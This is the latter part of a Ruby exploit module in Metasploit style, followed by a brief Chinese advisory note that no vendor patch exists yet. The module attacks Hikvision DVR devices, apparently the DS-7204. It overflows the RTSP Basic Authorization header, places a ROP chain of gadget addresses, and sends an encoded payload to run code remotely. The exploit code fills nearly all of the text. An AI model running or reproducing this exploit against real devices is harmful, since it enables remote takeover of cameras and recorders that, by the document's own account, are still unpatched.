request = "PLAY rtsp://#{rhost}/ RTSP/1.0\r\n"
request << "CSeq: 7\r\n"
request << "Authorization: Basic "
request << rand_text_alpha(0x280 + 34)
request << [target["g_adjustesp"]].pack("V")[0..2]
request << "\r\n\r\n"
request << rand_text_alpha(19)
# now append the ropchain
request << device_rop
request << rand_text_alpha(8)
request << payload.encoded
connect
sock.put(request)
disconnect
end
# These devices are armle, run version 1.3.1 of libupnp, have random stacks, but no PIE on libc
def target_ds7204_1
# Create a fixed-size buffer for the rop chain
ropbuf = rand_text_alpha(24)
# CHAIN = [
# 0, #R4 pop adjustsp
# 0, #R5 pop adjustsp
# GADGET_BLXR3_POP, #R6 pop adjustsp
# GADGET_POPR3,
# 0, #R3 pop
# GADGET_R3FROMSP,
# ]
ropbuf[8,4] = [target["g_blxr3_pop"]].pack("V")
ropbuf[12,4] = [target["g_popr3"]].pack("V")
ropbuf[20,4] = [target["g_r3fromsp"]].pack("V")
return ropbuf
end
# Generate a buffer that provides a starting point for exploit development
def target_debug
Rex::Text.pattern_create(2000)
end
def rhost
datastore['RHOST']
end
def rport
datastore['RPORT']
end
end
建议:
厂商补丁:
hikvision
---------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本: